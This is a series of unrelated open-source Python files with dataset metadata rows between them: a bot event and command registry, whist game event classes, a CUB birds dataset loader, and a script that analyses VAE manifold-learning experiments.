        while digiteff < len(decimalPart) and decimalPart[digiteff] == '0':
            digiteff += 1
        digiteff += 2
    else:
        digiteff = -len(intPart) + 2
except IndexError:
    digiteff = -len(intPart) + 2  # may not be true
return result.quantize(func.rounddigits(digiteff), ROUND_HALF_EVEN)
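# --- Illustrative usage sketch (not part of the original module) ---
# A worked example of the propagation formula U_f = sqrt(sum_i (df/dx_i)^2 * U_i^2)
# for f = x*y; the numeric values are made up, and this assumes the helpers in
# `functions` (func.eff / func.rounddigits) behave as used above.
if __name__ == '__main__':
    demo_means = {'x': Decimal('2.00'), 'y': Decimal('3.00')}
    demo_U = {'x': Decimal('0.05'), 'y': Decimal('0.02')}
    demo_vars = [x, y]  # sympy symbols imported via sympy.abc
    print(findCompMean('x*y', demo_vars, demo_means))           # compound mean
    print(findAbsFuncU('x*y', demo_U, demo_vars, demo_means))   # absolute U
    print(findRelaFuncU('x*y', demo_U, demo_vars, demo_means))  # relative U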
| 31.384615 | 103 | 0.572168 | 407 | 3,672 | 5.127764 | 0.243243 | 0.028749 | 0.026833 | 0.042166 | 0.561572 | 0.523718 | 0.46574 | 0.435074 | 0.435074 | 0.435074 | 0 | 0.011751 | 0.304739 | 3,672 | 116 | 104 | 31.655172 | 0.805719 | 0.209967 | 0 | 0.540541 | 0 | 0 | 0.009782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.054054 | 0 | 0.175676 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2f6de5e5cb0ff1bac4f2a109787e36e831a69bb | 3,946 | py | Python | tombot/registry.py | TijmenW/tom-bot | e9368a41562496761a111c28697384730f43db0e | [
"MIT"
] | 1 | 2020-02-02T21:41:01.000Z | 2020-02-02T21:41:01.000Z | tombot/registry.py | TijmenW/tom-bot | e9368a41562496761a111c28697384730f43db0e | [
"MIT"
] | 1 | 2021-05-17T13:14:30.000Z | 2021-05-17T13:14:30.000Z | tombot/registry.py | TijmenW/tom-bot | e9368a41562496761a111c28697384730f43db0e | [
"MIT"
] | 2 | 2020-02-19T17:20:46.000Z | 2020-07-29T18:51:10.000Z | '''
Contains generalized events and the command handlers.
'''
#pylint: disable=too-few-public-methods
import logging
import types
from collections import defaultdict
# Events
# Event constants:
# Format: NAME = 'identifier' # when, (args)
BOT_START = 'tombot.bot.start' # bot's start, (bot)
BOT_SHUTDOWN = 'tombot.bot.shutdown' # bot shutdown, (bot)
BOT_MSG_RECEIVE = 'tombot.layer.msg_receive' # message received, (bot, message)
BOT_CONNECTED = 'tombot.bot.connected' # connection established, (bot)
BOT_DISCONNECTED = 'tombot.bot.disconnected' # connection lost, (bot)
EVENT_HANDLERS = defaultdict(set)
class Subscribe(object):
'''
Subscribes the decorated function to an event. Function is not modified.
'''
def __init__(self, eventname):
self.eventname = eventname
def __call__(self, func):
if hasattr(self.eventname, '__iter__'):
if isinstance(self.eventname, types.StringTypes):
# String
EVENT_HANDLERS[self.eventname].add(func)
return func
# Iterable
for name in self.eventname:
EVENT_HANDLERS[name].add(func)
return func
# Something else
EVENT_HANDLERS[self.eventname].add(func)
return func
def fire_event(eventname, *args, **kwargs):
'''
Call all subscribed functions with the given arguments.
Functions which throw exceptions are unregistered.
'''
for func in list(EVENT_HANDLERS[eventname]):  # iterate a copy: failed handlers are removed mid-loop
try:
func(*args, **kwargs)
except Exception as ex: #pylint: disable=broad-except
LOGGER.critical('Event callback %s failed on event %s, disabled:', func, eventname)
LOGGER.critical(ex)
EVENT_HANDLERS[eventname].remove(func)
# Commands and RPC commands
class RegisteringDecorator(object):
'''
Generalized decorator for registering case-insensitive commands in a dict.
Must be overridden to specify target.
'''
target_dict = {}
def __init__(self, name):
self.name = name
def __call__(self, func):
if hasattr(self.name, '__iter__'):
for item in self.name:
self.target_dict[item.upper()] = func
else:
self.target_dict[self.name.upper()] = func
LOGGER.debug('Registered %s', self.name)
return func
COMMAND_DICT = {}
COMMAND_CATEGORIES = defaultdict(list)
RPC_DICT = {}
class RPCCommand(RegisteringDecorator):
''' Registers all functions that are available via the RPC socket. '''
target_dict = RPC_DICT
class Command(RegisteringDecorator):
''' Registers all functions that are available as a command, and in a help_function '''
target_dict = COMMAND_DICT
help_dict = COMMAND_CATEGORIES
def __init__(self, name, category=None, hidden=False):
self.hidden = hidden
self.category = category
super(Command, self).__init__(name)
def __call__(self, func):
if isinstance(self.name, types.StringTypes):
self.help_dict[self.category].append((self.name, None, func))
else:
self.help_dict[self.category].append((self.name[0], self.name[1:], func))
return super(Command, self).__call__(func)
def safe_call(target_dict, key, *args, **kwargs):
''' Wrapper to call a function and not crash if it excepts. '''
try:
return target_dict[key.upper()](*args, **kwargs)
except (NameError, TypeError):
raise
except Exception as ex: #pylint: disable=broad-except
del target_dict[key.upper()]  # keys are stored upper-cased
LOGGER.critical('Command %s disabled: %s', key, ex)
# Helper functions
def get_easy_logger(name, level=None):
''' Create a logger with the given name and optionally a level. '''
result = logging.getLogger(name)
if level:
result.setLevel(level)
return result
LOGGER = get_easy_logger('registry')
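# --- Illustrative usage sketch (not part of the original module) ---
# How the registry pieces above fit together; the handler bodies below are
# hypothetical.
#
# @Subscribe(BOT_START)
# def on_start(bot):
#     LOGGER.info('bot started: %s', bot)
#
# @Command('ping', category='misc')
# def ping(bot, message):
#     return 'pong'
#
# fire_event(BOT_START, bot=None)               # runs every BOT_START handler
# safe_call(COMMAND_DICT, 'ping', None, None)   # dispatches 'PING' safely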
| 32.081301 | 95 | 0.650025 | 467 | 3,946 | 5.327623 | 0.327623 | 0.03537 | 0.013264 | 0.018087 | 0.178055 | 0.178055 | 0.168006 | 0.099678 | 0 | 0 | 0 | 0.000672 | 0.245565 | 3,946 | 122 | 96 | 32.344262 | 0.835069 | 0.246072 | 0 | 0.202703 | 0 | 0 | 0.072721 | 0.016354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121622 | false | 0 | 0.040541 | 0 | 0.364865 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2f78778d85f1d18a46b7ce5d657b1b24b664e70 | 638 | py | Python | whist/game_events.py | PeterSR/pywhist | b66e92974c374d92fb34d28ed20e5af6940175b0 | [
"MIT"
] | null | null | null | whist/game_events.py | PeterSR/pywhist | b66e92974c374d92fb34d28ed20e5af6940175b0 | [
"MIT"
] | null | null | null | whist/game_events.py | PeterSR/pywhist | b66e92974c374d92fb34d28ed20e5af6940175b0 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from .cards import Trick
from .player import Player
from .partners import TeamID
from .game_actions import BaseAction
class BaseEvent:
pass
@dataclass(frozen=True)
class ActionTakenEvent(BaseEvent):
player: Player
action: BaseAction
def __str__(self):
return f"Player {self.player.name}: {self.action}"
@dataclass(frozen=True)
class TrickTakenEvent(BaseEvent):
player: Player
team_id: TeamID
trick: Trick
def __str__(self):
trick_symbols = tuple(card.symbol for card in self.trick)
return f"Player {self.player.name} took {trick_symbols}"
| 20.580645 | 65 | 0.722571 | 80 | 638 | 5.6125 | 0.4375 | 0.066815 | 0.084633 | 0.106904 | 0.120267 | 0.120267 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194357 | 638 | 30 | 66 | 21.266667 | 0.873541 | 0 | 0 | 0.285714 | 0 | 0 | 0.134796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0.047619 | 0.238095 | 0.047619 | 0.809524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2fbe936b6cb25bafa6c922903345c6baab44779 | 8,800 | py | Python | pynet/datasets/cub.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/datasets/cub.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/datasets/cub.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | import os
import torch
import logging
from PIL import Image
from itertools import compress
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
import torchvision.transforms as transforms
from torchvision.datasets import ImageFolder
from pynet.datasets.core import AbstractDataManager, DataItem, SetItem
import pandas as pd
import numpy as np
class CUBDataset(ImageFolder):
"""
cf. Catherine Wah et al, The caltech-ucsd birds-200-2011 dataset, 2011
200 bird categories with 11788 images.
This dataset contains 312 additional binary attributes considered as meta-data.
It can be used as "labels" in a self-supervised setting (only for training).
The training/test split follows the official one.
"""
def __init__(self, root, transform=None, target_transform=None, split="train",
bitransform=False, labels="birds", **kwargs):
"""
:param root: str, path to images folder
:param transform: callable, img transformation
:param target_transform: callable
:param split: str, either "train" or "test"
:param bitransform: bool, if True, returns 2 transformed versions same img
:param labels: either "birds" or "attributes"
:param kwargs: given to super()
"""
assert split in ["train", "test"], "Unknown split: %s"%split
assert labels in ["birds", "attributes"], "Unknown labels: %s"%labels
if split == "test" and labels == "attributes":
raise NotImplementedError()
self.bitransform = bitransform
self.labels = labels
# Returns the birds attributes as labels
if labels == "attributes":
attr_path = os.path.join(os.path.dirname(root), "meta_data_bin_train.csv")
if not os.path.exists(attr_path):
raise FileNotFoundError("Attributes not found in %s"%attr_path)
self.attr = pd.read_csv(attr_path, sep=",")
# Defines training/test split from the official one
train_test_split_pth = os.path.join(os.path.dirname(root), "train_test_split.txt")
img_pth = os.path.join(os.path.dirname(root), "images.txt")
if not os.path.exists(train_test_split_pth) or not os.path.exists(img_pth):
raise FileNotFoundError("Missing %s or %s in CUB dataset"%(train_test_split_pth, img_pth))
# "0" == test, "1" == train
train_test_split = pd.read_csv(train_test_split_pth, sep=" ", names=["id", "split"])
img_pth = pd.read_csv(img_pth, sep=" ", names=["id", "path"])
pth_split = pd.merge(train_test_split, img_pth, on="id", how="inner")
this_split = list(pth_split[pth_split.split.eq(split=="train")].path)
# Checks images repo and find all img paths
super().__init__(root, transform, target_transform, **kwargs)
filter = np.array(["/".join(pth.split("/")[-2:]) in this_split for (pth, _) in self.samples], dtype=bool)
assert filter.sum() == len(this_split), "Corrupted CUB data-set: " \
"images missing or corrupted train_test_split.txt"
self.samples = list(compress(self.samples, filter))
self.imgs = self.samples
if self.labels == "attributes":
# generate N X M matrix where N == len(train) and M == # attributes
imgs_df = pd.DataFrame(self.imgs, columns=["path", "class"])
imgs_df.loc[:, "path"] = imgs_df.path.apply(lambda p: "/".join(p.split("/")[-2:]))
self.attr = pd.merge(imgs_df, self.attr, on=["path"], how="left", sort=False)
attr_cols = [i for i in self.attr.columns if 'attr_val' in i]
self.attr = self.attr[attr_cols].to_numpy(dtype=np.float32)
assert len(self.attr) == len(self)
if split == "train":
assert len(self) == 5994
else:
assert len(self) == 5794
def __getitem__(self, index):
(sample, target) = super().__getitem__(index)
if self.labels == "attributes":
target = self.attr[index]
if self.bitransform:
(sample_1, _) = super().__getitem__(index)
sample = torch.stack((sample, sample_1), dim=0)
return sample, target
return sample, target
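# --- Illustrative usage sketch (not part of the original module) ---
# Minimal instantiation of CUBDataset; the root path is hypothetical and must
# point to the CUB "images" folder, with images.txt and train_test_split.txt
# one directory above it.
#
# import torchvision.transforms as T
# ds = CUBDataset(root="/data/CUB_200_2011/images",
#                 transform=T.Compose([T.Resize(256), T.CenterCrop(224),
#                                      T.ToTensor()]),
#                 split="train", labels="birds")
# img, label = ds[0]  # transformed image tensor and bird class index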
class CUBDataManager(AbstractDataManager):
"""
NOTE: the train/test transformations follow the ones defined by
Tsai et al., Conditional Contrastive Learning with Kernel, ICLR 2022
"""
def __init__(self, root:str, bitransform:bool=False, labels:str="birds", number_of_folds:int=1,
sampler: str="random", batch_size: int=1, **dataloader_kwargs):
"""
:param root: path to image dir
:param bitransform: bool, if True, returns 2 tf versions of same img with agressive train tf.
Otherwise, use same train tf as test tf.
:param labels: either "birds" or "attributes"
:param number_of_folds: ignored (only one split train/test), just for compatibility reason
:param dataloader_kwargs: given to DataLoader()
"""
assert sampler in ["random", "sequential"], "Unknown sampler '%s'"%sampler
mean_std = ((0.4863, 0.4999, 0.4312), (0.2070, 0.2018, 0.2428))
self.batch_size = batch_size
self.sampler = sampler
self.logger = logging.getLogger("pynet")
def ColorDistortion(s=1.0):
# s is the strength of color distortion.
color_jitter = transforms.ColorJitter(0.8 * s, 0.8 * s, 0.8 * s, 0.2 * s)
rnd_color_jitter = transforms.RandomApply([color_jitter], p=0.8)
rnd_gray = transforms.RandomGrayscale(p=0.2)
color_distort = transforms.Compose([rnd_color_jitter, rnd_gray])
return color_distort
train_transforms = transforms.Compose([
transforms.RandomResizedCrop(224, interpolation=Image.BICUBIC),
transforms.RandomHorizontalFlip(),
ColorDistortion(s=0.5),
transforms.ToTensor(),
transforms.Normalize(*mean_std),
])
test_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(*mean_std),
])
if not bitransform:
train_transforms = test_transforms
self.dataset = {
"train": [CUBDataset(root, bitransform=bitransform, split="train", labels=labels,
transform=train_transforms)],
"test": CUBDataset(root, split="test", labels="birds", transform=test_transforms)
}
self.dataloader_kwargs = dataloader_kwargs
@staticmethod
def collate_fn(list_samples):
""" After fetching a list of samples using the indices from sampler,
the function passed as the collate_fn argument is used to collate lists
of samples into batches.
A custom collate_fn is used here to apply the transformations.
See https://pytorch.org/docs/stable/data.html#dataloader-collate-fn.
"""
data = dict(outputs=None) # compliant with DataManager <collate_fn>
elem = list_samples[0]
data["inputs"] = torch.stack([sample[0] for sample in list_samples], dim=0).float()
if isinstance(elem[1], np.ndarray):
data["labels"] = torch.stack([torch.from_numpy(sample[1]) for sample in list_samples], dim=0).squeeze().float()
elif isinstance(elem[1], float) or isinstance(elem[1], int):
data["labels"] = torch.tensor([sample[1] for sample in list_samples]).float()
return DataItem(**data)
def get_dataloader(self, train=False, validation=False, test=False, fold_index=0, **kwargs):
train_, test_ = None, None
if train:
if self.sampler == "random":
sampler = RandomSampler(self.dataset["train"][fold_index])
else:
sampler = SequentialSampler(self.dataset["train"][fold_index])
self.logger.warning("Sequential Sampler for training set.")
train_ = DataLoader(self.dataset['train'][fold_index],
batch_size=self.batch_size, sampler=sampler,
collate_fn=CUBDataManager.collate_fn,
**self.dataloader_kwargs)
if test:
test_ = DataLoader(self.dataset['test'],
batch_size=self.batch_size,
collate_fn=CUBDataManager.collate_fn,
**self.dataloader_kwargs)
return SetItem(train=train_, test=test_)
def get_nb_folds(self):
return 1 | 47.826087 | 123 | 0.617727 | 1,064 | 8,800 | 4.973684 | 0.265977 | 0.022109 | 0.021164 | 0.01285 | 0.12774 | 0.098828 | 0.0822 | 0.03099 | 0 | 0 | 0 | 0.017601 | 0.270455 | 8,800 | 184 | 124 | 47.826087 | 0.806698 | 0.197955 | 0 | 0.129032 | 0 | 0 | 0.075847 | 0.003387 | 0 | 0 | 0 | 0 | 0.056452 | 1 | 0.056452 | false | 0 | 0.08871 | 0.008065 | 0.209677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2fd80e0dd958c8f4932541c7c796d5fba2375bb | 24,569 | py | Python | smp_manifold_learning/scripts/vae_analysis.py | gsutanto/smp_manifold_learning | 60ef8278942c784c8d3bcd0a09031475f80d96fb | [
"MIT"
] | 11 | 2020-09-26T12:13:01.000Z | 2022-03-23T07:34:14.000Z | smp_manifold_learning/scripts/vae_analysis.py | gsutanto/smp_manifold_learning | 60ef8278942c784c8d3bcd0a09031475f80d96fb | [
"MIT"
] | 1 | 2021-04-10T10:42:28.000Z | 2021-04-16T07:04:26.000Z | smp_manifold_learning/scripts/vae_analysis.py | gsutanto/smp_manifold_learning | 60ef8278942c784c8d3bcd0a09031475f80d96fb | [
"MIT"
] | 5 | 2020-09-24T18:52:46.000Z | 2022-03-23T07:26:15.000Z | #!/usr/bin/env python3
import numpy as np
import os
import dill
import json
import pandas as pd
import torch
import matplotlib.pyplot as plt
import plotly.graph_objects as go
from smp_manifold_learning.motion_planner.feature import SphereFeature, LoopFeature
from smp_manifold_learning.differentiable_models.utils import create_dir_if_not_exist
class RenameUnpickler(dill.Unpickler):
def find_class(self, module, name):
renamed_module = module
if module == "vae":
renamed_module = "smp_manifold_learning.differentiable_models.vae"
if module == "nn":
renamed_module = "smp_manifold_learning.differentiable_models.nn"
return super(RenameUnpickler, self).find_class(renamed_module, name)
def renamed_load(file_obj):
return RenameUnpickler(file_obj).load()
class ResultsAnalyzer:
def __init__(self, folder, name=None):
# this is meant to analyze the results of tests run using the smallab
# package. the folder given should be the topmost folder
# (experiment_runs is the default name), holding all the experiments.
self.folder = folder
if name is not None:
self.name = name
else:
# this is the name of the first experiment that was given to the
# Runner
self.name = os.listdir(self.folder)[0]
self.logs_folder = '/'.join([self.folder, self.name, 'logs'])
self.experiments_folder = '/'.join(
[self.folder, self.name, 'experiments'])
self.runs = None
self.specs = None
self.spec_variables = None
self.results_variables = None
def get_single_run(self, name):
# name is the hash of the experiment, given by smallab
# a run is a dict with two entries: "result" and "specification", each
# of which is a dictionary
filename = '/'.join([self.experiments_folder, name, 'run.pkl'])
with open(filename, 'rb') as f:
#run = dill.load(f)
run = renamed_load(f)
return run
def get_all_runs(self):
# only creates the runs dict if it has not previously been created
if self.runs is not None:
return self.runs
self.runs = {}
for d in os.listdir(self.experiments_folder):
# d is the hash of each experiment
self.runs[d] = self.get_single_run(d)
self.spec_variables = self.runs[d]["specification"].keys()
self.results_variables = self.runs[d]["result"].keys()
return self.runs
def get_single_specification(self, name):
# returns spec as a dictionary
# name is the hash of the experiment, given by smallab
filename = '/'.join(
[self.experiments_folder, name, 'specification.json'])
with open(filename, 'rb') as f:
spec = json.load(f)
return spec
def get_all_specifications(self):
# only creates the specs dict if it has not already been created
if self.specs is not None:
return self.specs
self.specs = {}
for d in os.listdir(self.experiments_folder):
# d is the hash of each experiment
self.specs[d] = self.get_single_specification(d)
return self.specs
def get_results_for_parameter(self, parameter_name, results_vars=None):
# answers q: "how does varying [param] affect the results?" returns
# average results for each value of param
if results_vars is None:
results_vars = self.results_variables
param_results = dict()
for experiment, run in self.runs.items():
specs = run["specification"]
result = run["result"]
param_value = specs[parameter_name]
# lists can't be keys of a dictionary
if isinstance(param_value, list):
param_value = tuple(param_value)
if param_value in param_results:
for res in results_vars:
param_results[param_value][res].append(result[res])
else:
param_results[param_value] = dict()
for res in results_vars:
param_results[param_value][res] = [result[res]]
# once all experiments have been added to param_results, we find avgs
param_results_avg = dict()
for val, d in param_results.items():
# val is one of the values that parameter takes on
# results is a dict of lists: results["loss"] = [l1, l2, l3, ...]
# but values inside the lists could be floats, tensors, arrays, etc
param_results_avg[val] = dict()
for metric, results in d.items():
if isinstance(results[0], float) or isinstance(
results[0], int) or isinstance(results[0], np.number):
r_avg = np.mean(results)
elif isinstance(results[0], np.ndarray) or isinstance(
results[0], list) or isinstance(results[0], tuple):
r_avg = np.mean(np.vstack([l for l in results]), axis=0)
elif type(results[0]) == torch.Tensor:
r_avg = np.mean([i.item() for i in results], axis=0)
else:
t = type(results[0])
print(
f"WARNING: Can't take mean of results of type {t}; ignoring"
)
continue
param_results_avg[val][metric] = r_avg
return param_results_avg
def barplot_for_parameter(self,
parameter_name,
plot_metrics=None,
ignore_metrics=None,
subplots=False):
"""
plot_metrics is a list of metrics (strings) that should be plotted. it
should be a subset of avail_metrics (the actual metrics that were
computed for the experiments). This function will ignore any metrics in
plot_metrics that are not in avail_metrics.
"""
if plot_metrics is None:
plot_metrics = self.results_variables
if ignore_metrics is None:
ignore_metrics = []
# param_results[value][metric] = average value, which can be an array or
# a number
param_results = self.get_results_for_parameter(parameter_name)
xs = sorted([k for k in param_results.keys()])
avail_metrics = [k for k in param_results[xs[0]].keys()
] # "re", "kld", etc...
# use the metrics as the different bars in the plot
d = dict()
for x in xs:
for m in avail_metrics:
if m not in plot_metrics or m in ignore_metrics:
continue
if m not in d:
d[m] = []
d[m].append(param_results[x][m])
df = pd.DataFrame(d, index=xs)
# time to plot
ax = df.plot.bar(rot=0, subplots=subplots)
if not subplots:
for p in ax.patches:
ax.annotate(np.round(p.get_height(), decimals=2),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='center',
va='center',
xytext=(0, 10),
textcoords='offset points')
ax.set_xlabel(parameter_name)
ax.set_ylabel("Metrics")
ax.set_title(
f"Average metrics for all models vs. {parameter_name}: {self.name}"
)
else:
# ax is actually a list of axis objects
a = [_ for _ in ax]
for ax in a:
for p in ax.patches:
ax.annotate(
np.round(p.get_height(), decimals=2),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='center',
va='center',
xytext=(0, 10),
textcoords='offset points')
ax.set_xlabel(parameter_name)
ax.set_ylabel("Metric value")
ax.set_title(
f"Average metric for all models vs. {parameter_name}: {self.name}"
)
plt.show
return ax
def load_data_from_folder_if_from_dataset(folder, dataset):
return [
np.load(folder + f) for f in os.listdir(folder)
if f.split('/')[-1].split('_')[0] == dataset
]
def plot_ly(dataset_name,
training_data,
recon_folder,
sample_folder,
model_idx_to_plot=2,
plot_4d=False,
plot_slice=False):
# model_idx_to_plot is arbitrarily set to 2, can be set to any index within
# the range of n_trials set during the experiment runs.
# if plot_slice and plot_4d are both True, plot_slice is ignored.
opac = 0.5
recon = load_data_from_folder_if_from_dataset(recon_folder, dataset_name)
samples = load_data_from_folder_if_from_dataset(sample_folder,
dataset_name)
if not plot_4d:
if not plot_slice:
sz = 2
sample_sz = 5
plot_data = [
go.Scatter3d(x=samples[model_idx_to_plot][:, 0],
y=samples[model_idx_to_plot][:, 1],
z=samples[model_idx_to_plot][:, 2],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter3d(x=training_data[:, 0],
y=training_data[:, 1],
z=training_data[:, 2],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac)),
go.Scatter3d(x=recon[model_idx_to_plot][:, 0],
y=recon[model_idx_to_plot][:, 1],
z=recon[model_idx_to_plot][:, 2],
name="Reconstructed train",
mode='markers',
marker=dict(size=sz, opacity=opac))
]
else:
# 2D: only plot points who have -0.025 < z < 0.025
# (s[:, 0] < 0) & (s[:, 1] >= 0) & # for x < 0 and y < 0 too
sz = 12
sample_sz = 18
opac = 1
slice_width = 0.03
s = samples[model_idx_to_plot]
samples_to_plot = s[(s[:, 2] >= -slice_width) &
(s[:, 2] <= slice_width), :]
r = recon[model_idx_to_plot]
recon_to_plot = r[(r[:, 2] >= -slice_width) &
(r[:, 2] <= slice_width), :]
training_to_plot = training_data[
(training_data[:, 2] >= -slice_width) &
(training_data[:, 2] <= slice_width), :]
plot_data = [
go.Scatter(x=samples_to_plot[:, 0],
y=samples_to_plot[:, 1],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter(x=training_to_plot[:, 0],
y=training_to_plot[:, 1],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac / 2)),
go.Scatter(x=recon_to_plot[:, 0],
y=recon_to_plot[:, 1],
name="Reconstructed train",
mode='markers',
marker=dict(size=sz, opacity=opac))
]
else:
sz = 2
sample_sz = 5
plot_data = [
go.Scatter3d(x=samples[model_idx_to_plot][:, 0],
y=samples[model_idx_to_plot][:, 1],
z=samples[model_idx_to_plot][:, 2],
name="Samples",
mode='markers',
marker=dict(size=sample_sz,
opacity=opac,
color=samples[2][:, 3],
colorscale='blues')),
go.Scatter3d(x=training_data[:, 0],
y=training_data[:, 1],
z=training_data[:, 2],
name="Training data",
mode='markers',
marker=dict(size=sz,
opacity=opac,
color=training_data[:, 3],
colorscale='purpor')),
go.Scatter3d(x=recon[model_idx_to_plot][:, 0],
y=recon[model_idx_to_plot][:, 1],
z=recon[model_idx_to_plot][:, 2],
name="Reconstructed train",
mode='markers',
marker=dict(size=sz,
opacity=opac,
color=recon[2][:, 3],
colorscale='greens'))
]
fig = go.Figure(data=plot_data)
fig.update_layout(
title=f"Visualization of the VAE manifold for {dataset_name} dataset")
# fig.update_layout(height=800, width=1050) # could be useful for slice
fig.show()
def create_gt_feat(dataset_option):
""" 1:sphere, 2:circle, 3:3dof, 4:6dof """
if dataset_option == 1:
feat = SphereFeature(r=1.0)
elif dataset_option == 2:
feat = LoopFeature(r=1.0)
else:
print(f"Error: Dataset option {dataset_option} invalid")
return
return feat
def evaluate_on_gt_manifold(gt_dataset, data, threshold=0.1):
"""
gt_dataset can be string ("sphere", "3dof", etc) or int (1,2,3)
-- will be converted to int if given as string
returns:
Number of data points below threshold away from feat
Number of data points total
(d,) numpy array of distances of each data point from the feat
"""
dataset_id_dict = dict({
"sphere": 1,
"circle": 2,
"3dof": 3,
"6dof": 4,
})
if isinstance(gt_dataset, str):
gt_dataset = dataset_id_dict[gt_dataset]
if gt_dataset >= 3:
print(
"WARNING: eval statistics invalid for this run. 3DOF (Plane) and 6DOF (Orient) datasets are not supported for this evaluation function."
)
return 0, 1, [1] # no support for 6dof dataset in this release
feat = create_gt_feat(dataset_option=gt_dataset)
n_success = 0
n_total = data.shape[0]
distances = np.empty(n_total)
for i, q in enumerate(data):
q = q.astype('float64')
dist = np.linalg.norm(feat.y(q))
distances[i] = dist
if dist < threshold:
n_success += 1
return n_success, n_total, distances
def get_mean_std(x):
return np.mean(x), np.std(x)
def get_and_print_eval_stats(foldername, dataset, threshold=0.1):
""" given foldername where all npy files to be evaluated are, and the name
of the dataset, returns mean and std % success, mean and std of distances of
those npy datasets to the ground truth manifold. """
ds = load_data_from_folder_if_from_dataset(foldername, dataset)
pct_successes, all_distances = [], []
for d in ds:
n_success, n_total, distances = evaluate_on_gt_manifold(
gt_dataset=dataset, data=d, threshold=threshold)
pct_successes.append(100 * (n_success / n_total))
all_distances.extend(distances)
pct_mu, pct_std = get_mean_std(pct_successes)
dist_mu, dist_std = get_mean_std(all_distances)
print("==============")
print(
f"Evaluation for {dataset} data in {foldername} (threshold={threshold}):"
)
print(
f"Mean and std of pct success: {round(pct_mu,3)} \pm {round(pct_std,3)}"
)
print(
f"Mean and std of distance: {round(dist_mu,3)} \pm {round(dist_std,3)}"
)
print("==============")
return pct_mu, pct_std, dist_mu, dist_std
def full_vae_evaluation_for_dataset(dataset_name,
training_data_filepath,
experiment_trials_foldername,
experiment_folder="experiment_runs",
do_barplots=False,
x_axis_param="n_trials",
plot_metrics=None,
ignore_metrics=['time', 'kld'],
subplots=False,
do_save_samples=True,
n_samples=1000,
saved_samples_folder="samples/",
do_save_recon=True,
saved_recon_folder="reconstruction/",
do_plot=True,
plot_4d=False,
do_eval=True,
do_plot_slice=False,
threshold=0.1):
print(f"Running full evaluation for dataset {dataset_name}...")
training_data = np.load(training_data_filepath)
# Get numerical results from training
a = ResultsAnalyzer(experiment_folder, experiment_trials_foldername)
_ = a.get_all_runs()
_ = a.get_all_specifications()
if do_barplots:
print(f"Producing barplot for parameter {x_axis_param}...")
a.barplot_for_parameter(parameter_name=x_axis_param,
plot_metrics=plot_metrics,
ignore_metrics=ignore_metrics,
subplots=subplots)
plt.show(block=False)
# get/save samples and reconstructed data
for name, run in a.runs.items():
result = run["result"]
vae = result["vae"]
if do_save_samples:
print(f"Producing and saving samples from experiment {name}...")
create_dir_if_not_exist(saved_samples_folder)
fname = saved_samples_folder + dataset_name + '_' + name + "_samples.npy"
samples = np.array([vae.sample() for _ in range(n_samples)])
np.save(fname, samples)
if do_save_recon:
print(
f"Producing and saving reconstructed data from experiment {name}..."
)
create_dir_if_not_exist(saved_recon_folder)
fname = saved_recon_folder + dataset_name + '_' + name + "_recon.npy"
configs = vae.forward(
torch.from_numpy(training_data).float()).detach().numpy()
np.save(fname, configs)
# visualize training, reconstructed, and sample data
if do_plot:
print("Plotting training, reconstructed, and sampled data...")
plot_ly(dataset_name,
training_data,
saved_recon_folder,
saved_samples_folder,
plot_slice=do_plot_slice)
if do_eval:
print("Computing evaluation statistics...")
get_and_print_eval_stats(foldername=saved_recon_folder,
dataset=dataset_name,
threshold=threshold)
get_and_print_eval_stats(foldername=saved_samples_folder,
dataset=dataset_name,
threshold=threshold)
if __name__ == '__main__':
experiment_folder = "experiment_runs/"
do_barplots = True # True: generate barplots of VAE training metrics
do_save_samples = True # True: save newly generated VAE samples
do_save_recon = True # True: save the VAE-reconstructed gt data
do_plot = True # True: generate plotly plots of learned manifolds
do_eval = True # True: get success rates and distance statistics
do_plot_slice = False # True: plot slices of the manifolds near z=0
do_ecomann_plot = True # True: plot the ECoMaNN samples for Plane
if do_ecomann_plot:
samples = np.load("ecmnn_projected_data/ecmnn_3dof_projected.npy")
training_data = np.load("../data/trajectories/3dof_v2_traj.npy")
opac = 0.5
if do_plot_slice:
# 2D: only plot points who have -slice_width <= z <= slice_width
